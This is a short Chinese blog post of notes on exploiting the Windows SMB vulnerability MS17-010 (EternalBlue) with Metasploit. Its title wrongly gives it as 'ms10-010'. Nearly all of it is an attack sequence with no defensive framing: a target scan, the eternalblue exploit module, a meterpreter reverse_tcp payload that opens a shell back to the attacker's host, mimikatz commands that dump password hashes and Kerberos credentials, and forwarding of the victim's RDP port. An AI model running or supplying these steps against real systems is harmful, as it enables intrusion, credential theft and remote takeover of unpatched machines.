msf ms10-010利用笔记

Posted 暮雪超霸

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了msf ms10-010利用笔记相关的知识,希望对你有一定的参考价值。

nmap -sV -Pn xxxxx  扫描端口and系统信息

use auxiliary/scanner/smb/smb_ms17_010   扫描模块

set Rhosts 扫描目标

 

use exploit/windows/smb/ms17_010_eternalblue   攻击模块

需要设置目标ip

RHOST  

本机IP LHost

攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

 

 

load mimikatz  加载mimikatz

msv导出hash

kerberos 获取账户密码

端口转发-

portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r xxxxx目标ip

将目标的3389转发到本机3389上

 

以上是关于msf ms10-010利用笔记的主要内容,如果未能解决你的问题,请参考以下文章

《内网安全攻防:渗透测试实战指南》读书笔记:权限提升分析及防御

ms17010漏洞利用msf 2019-03-27 ms070-

使用MSF对MS17-010的利用演示

跳板攻击之:MSF portfwd 端口转发与端口映射

MSF利用ms17_010实验

利用MSF的MS08_067模块攻击windows server 2003 SP2中文版系统